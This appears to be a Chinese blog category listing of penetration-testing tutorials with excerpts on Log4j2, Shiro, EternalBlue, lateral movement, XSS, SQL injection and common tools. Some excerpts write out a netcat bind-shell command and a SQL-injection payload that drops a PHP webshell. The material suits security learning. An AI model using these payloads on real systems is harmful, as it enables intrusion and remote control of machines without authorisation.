![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 82
makven60
这个作者很懒,什么都没留下…
展开
-
帆软报表 V8 get_geo_json 任意文件读取漏洞
帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757原创 2023-01-25 22:18:13 · 6351 阅读 · 1 评论 -
Zookeeper未授权访问漏洞利用
Zookeeper未授权访问漏洞利用原创 2023-01-25 20:04:58 · 986 阅读 · 0 评论 -
用友 NC bsh.servlet.BshServlet RCE利用
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞原创 2023-01-09 11:54:38 · 5488 阅读 · 0 评论 -
Nacos 漏洞利用
在src挖掘中碰到的漏洞,于是了解了一下该漏洞和漏洞的利用方式原创 2023-01-03 18:13:22 · 7032 阅读 · 1 评论 -
shiro反序列化漏洞复现(CVE-2016-4437)
shiro反序列化漏洞复现(CVE-2016-4437)1.漏洞简介Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序漏洞原理:在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编原创 2022-04-14 16:46:14 · 3626 阅读 · 0 评论 -
Apache Log4j2 RCE漏洞复现
Apache Log4j2 RCE漏洞复现1.漏洞介绍Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。影响版本:Apache Log4j 2.x<=2.15.0.rc1漏洞编号:CVE-2021-442282.漏洞环境搭建目标:Ubuntu ip: 192.168.241.129攻击机 :kail ip: 192.168.241.128由于我的Ubuntu虚拟机已经搭建过docker,直接用以下命令原创 2022-04-13 17:30:36 · 1991 阅读 · 0 评论 -
内网渗透-横向渗透2
内网渗透-横向渗透21.域横向 PTH&PTK&PTT 哈希票据传递1.域横向移动 PTH 传递PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试1.PTH攻击介绍 PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Ha原创 2022-04-04 16:40:11 · 2878 阅读 · 0 评论 -
内网渗透-横向渗透1
内网渗透-横向渗透11.横向渗透明文传递 at&schtasks 在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户 名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schta原创 2022-04-01 19:58:27 · 2446 阅读 · 0 评论 -
内网代理穿透
内网代理穿透实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要介绍Termite对模拟内网进行操作,Termite 是EW(EarthWorm)的最新版1.nc工具使用windows中使用nc,需要安装nc.exe靶机nc.exe -l -p 4444 -t -e cmd.exe攻击机nc.exe 192.168.1.1 4444linux中使用nc,见工具使用栏中的netcat使用博客2.termite使用 一款极度小巧灵活的跳板原创 2022-03-31 18:48:39 · 2916 阅读 · 0 评论 -
内网渗透信息收集
内网渗透信息收集1.前言 内网信息收集的目的是为了深入的了解内网情况,为了横向移动,权限维持,长期渗透做准备,收集的内容包括有:本机系统信息,本地网络信息,域内用户,域组信息等。收集并分析了这些信息,对于我们在内网进行渗透有一定的帮助作用2.本机信息(windows)1.系统信息:查看系统信息,查看当前机器的版本号,机器名,补丁号,一般收集系统信息是为了查看当前机器为36/64位,机器是什么版本的机器。机器在域内则继续收集域内信息hostname获取机器名systemi原创 2022-03-31 08:19:28 · 201 阅读 · 0 评论 -
内网渗透—域控与域环境搭建
内网渗透—域控与域环境搭建1.域环境搭建配置环境:VMware虚拟机:Windows 2008 R2,Windows 101.配置静态ip,设置DNS为自己的ip2.运行输入dcpromo3.创建域名称4.重启改域控管理密码5.将内网计算机加入域网络6.配置域测略到域内计算机2.搭建域控服务器将Windows 2008 R2配置为域控服务器1、配置静态IP,域服务器不能为动态IP可以在命令行中输入ncpa.cpl,进入网络配置2.在cmd中输入dcpromo,下一步到如下界面原创 2022-03-29 21:58:55 · 2364 阅读 · 0 评论 -
内网域渗透基础知识
内网域渗透基础知识1.内网简介 **内网即局域网(LAN)**是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网是封闭型的,可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成。比如内网中的机器,输入ipconfig /all发现我们的ip是192.168…,内网中一号机器是192.168.0.1,二号机器是192.168.0.2,以此类推,但是我们在浏览器中输原创 2022-03-29 16:15:47 · 2638 阅读 · 0 评论 -
XXE漏洞
XXE漏洞1.漏洞简介 XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。2.XML简介 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一原创 2022-03-29 12:00:35 · 2360 阅读 · 0 评论 -
CRLF漏洞
CRLF漏洞1.漏洞介绍 CRLF是”回车 + 换行”(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又称为HTTP响应拆分漏洞HTTP Response Splitting,简称HRS2.漏洞检测CRLF注入漏洞的本质和XSS有原创 2022-03-27 19:31:51 · 1052 阅读 · 0 评论 -
永恒之蓝MS17-010漏洞复现
永恒之蓝MS17-010漏洞复现1.永恒之蓝简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服原创 2022-03-27 09:58:46 · 4667 阅读 · 2 评论 -
MSF使用教程
MSF使用教程1.简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.MSF模块介绍1.辅助模块 auxiliary负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能2.渗透攻击模块exploits利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系原创 2022-03-26 21:15:36 · 9683 阅读 · 2 评论 -
SQL注入写webshell
SQL注入写webshell1.MySQL写shell写入WebShell的几种方式1、利用Union select 写入需要满足的条件对web目录有写权限GPC关闭(GPC:是否对单引号转义)有绝对路径(读文件可以不用,写文件需要)没有配置secure-file-priv?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php'?id=1 union select原创 2022-03-25 09:54:26 · 2724 阅读 · 0 评论 -
nmap 工具使用
nmap 功能简介1.概述 大家都知道,我们使用的nmap功能非常强大,从发现主机,到端口探测,到服务发现,漏洞利用等等,无所不能。nmap扫主要包括四个方面的扫描功能分别是主机发现(Host Discovery)、端口扫描(Port Scanning)、应用与版本侦测(Version Detection)、操作系统侦测(Operating System Detection)2.简单使用简单扫描:主机探测nmap 192.168.1.1对结果进行详细输出:nmap -vv 192.168原创 2022-03-24 09:19:08 · 6015 阅读 · 0 评论 -
常见的Web源码泄漏漏洞
常见的Web源码泄漏漏洞1.Git 源码泄露 开发人员会使用 git 进行版本控制,对站点自动部署。但如果配置不当,可能会将 .git 文件夹直接部署到线上环境,这就引起了 git 泄露漏洞,我们可以利用这个漏洞直接获得网页源码简要介绍git的目录结构在一个目录中初始化一个仓库以后 , 会在这个目录下产生一个名叫 .git 的隐藏文件夹(版本库)这个文件夹里面保存了这个仓库的所有版本等一系列信息一般来说 , 一个git仓库还存在这两个文件 :README.md (项目介绍).gitign原创 2022-03-23 10:57:10 · 4032 阅读 · 0 评论 -
文件上传漏洞靶场--upload-labs通关过程
文件上传漏洞靶场–upload-labs通关过程Pass-01(前端验证)点击提示:提示我们该文件类型不允许上传,应该是前端对文件类型进行了验证。对于前端验证,我们有多种方法可进行绕过:但burp抓包方便快速。这里直接修改文件后缀名为白名单中的后缀名,然后抓包进行修改直接将文件名改为1.php,然后进行上传如图,表示上传成功。Pass-02(MIME验证)提示表示:本pass在服务端对数据包的MIME进行检查!MIME是HTTP头文件中的Content-Type类型,如果上传的是P原创 2022-03-22 12:42:32 · 4672 阅读 · 0 评论 -
PHP反序列化漏洞
PHP反序列化漏洞1.关于php面向对象编程:对象:可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。类:一个共享相同结构和行为的对象的集合。 每个类的定义都以关键字class开头,后面跟着类的名字。一个类可以包含有属于自己的变量,变量(称为“属性”)以及函数(“称为方法”)。类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号“__”开头的,比如_construct,_d原创 2022-03-22 10:17:17 · 546 阅读 · 0 评论 -
xray工具使用
xray工具使用1.基本使用Linux / Mac用户在终端(终端)运行,Windows用户请在Powershell或其他高级Shell中运行查看 xray 的版本号。 .\xray_windows_amd64.exe version使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描:xray webscan --basic-crawler http://example.com --html-output xxx.html (--html-output:输出到 HTML 文件中)使用 HTT原创 2022-03-22 10:12:24 · 5072 阅读 · 0 评论 -
权限提升漏洞
权限提升1.权限提升权限介绍 当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要提升自己的权限,就得在后台页面中寻找漏洞利用的点,成功上传webshell提升权限 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服原创 2022-03-22 10:09:50 · 1874 阅读 · 0 评论 -
文件包含漏洞
文件包含漏洞1.什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。2. 文件包含漏洞原理 文件包含是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令原创 2022-03-22 10:06:29 · 306 阅读 · 0 评论 -
逻辑越权漏洞
逻辑越权漏洞1.漏洞描述 越权访问(Broken Access Control,BAC),指应用在检查授权时存在漏洞,使得攻击者在获得低权限用户账号后,利用一些方式绕过权限检查,访问或者操作其他用户或者更高权限的用户。越权的成因是因为开发人员在对数据进行增删查改时,对客户端请求的数据过分相信而遗漏了权限的判定,权限验证不当而导致的越权行为。2.漏洞产生的原因通常情况下,一个 Web 程序功能流程是登录 - 提交请求 - 验证权限 - 数据库查询 - 返回结果。如果验证权限不足,便会导致越权。常原创 2022-03-21 10:48:49 · 472 阅读 · 0 评论 -
SSTI模板注入
SSTI模板注入1.SSTI简介SSTI 就是服务器端模板注入(Server-Side Template Injection) 当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将原创 2022-03-21 10:36:35 · 9706 阅读 · 3 评论 -
Web中间件漏洞
Web中间件漏洞1.IIS漏洞1.简介 IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003一起发行,但在Windows XP Home版本上并没有IIS。IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服原创 2022-03-21 10:18:51 · 391 阅读 · 0 评论 -
文件包含漏洞
文件包含漏洞1.什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。2. 文件包含漏洞原理 文件包含是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令原创 2022-03-21 10:15:43 · 2484 阅读 · 0 评论 -
文件上传漏洞
文件上传漏洞1.什么是文件上传漏洞 文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。2.漏洞产生原因 由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型, 导致攻击者能够向某个可通过 Web 访问 的目录上传恶意文件,并被脚本解析器执行,这样就可以在远程服务器上执行恶意脚本 。3.文件上传漏洞危害原创 2022-03-21 10:06:32 · 1114 阅读 · 0 评论 -
sqlmap工具使用
sqlmap工具使用1.sqlmap介绍SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点:1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而原创 2022-03-21 09:59:39 · 3582 阅读 · 0 评论 -
REC代码及命令执行漏洞
REC代码及命令执行漏洞1.RCE介绍全称:remote command/code execute分为远程命令执行和远程代码执行1.命令执行漏洞: 直接调用操作系统命令代码执行漏洞: 靠执行脚本代码调用操作系统命令 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。2.代码执行漏洞1.漏洞介绍原创 2022-03-21 09:55:09 · 2671 阅读 · 0 评论 -
SSRF漏洞
SSRF漏洞1.什么是SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。2.SSRF漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造。SSRF利用存在缺陷的Web 应用作为代理攻原创 2022-03-21 09:49:50 · 1140 阅读 · 0 评论 -
CSRF跨站请求伪造
CSRF跨站请求伪造1.什么是CSRF CSRF攻击的全称是跨站请求伪造( cross site request forgery),是一种对网站的恶意利用,尽管听起来跟XSS跨站脚本攻击有点相似,但事实上CSRF与XSS差别很大,XSS利用的是站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求。 CRSF能做的事情包括利用你的身份发邮件、发短信、进行交易转账等,甚至盗取你的账号。2.C原创 2022-03-21 09:42:43 · 506 阅读 · 0 评论 -
信息收集-CDN绕过
1.信息收集-CDN绕过1.CDN简介1.1CDN介绍 CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。1.2做渗透测试为何要绕过CDN? 因为CDN 如果存在的话,渗透工作人员访问到的只是CDN缓存节点,而并非访问到真正的源站原创 2022-03-21 09:37:03 · 855 阅读 · 0 评论 -
XSS(跨站攻击)
XSS漏洞(跨站脚本)1.XSS 漏洞简介 XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。常见的输出函数有: echo printf print print_r spr原创 2022-03-20 23:05:08 · 38187 阅读 · 3 评论 -
SQL注入详解
SQL注入详解1.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一2. sql 注入产生原因及威胁 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行原创 2022-03-20 22:58:48 · 43148 阅读 · 6 评论 -
信息收集总结
信息收集总结1.域名信息收集(whois)国外的who.is:https://who.is/站长之家: http://whois.chinaz.com/爱站: https://whois.aizhan.com/微步: https://x.threatbook.cn/这些网站都可以收集whois信息,而且还很全面,主要关注:注册商、注册人、邮件、DNS解析服务器、注册人联系电话。2.备案信息查询查企业的备案信息,主要有三种方式天眼查:https://www.tianyancha原创 2022-03-20 22:40:49 · 3163 阅读 · 0 评论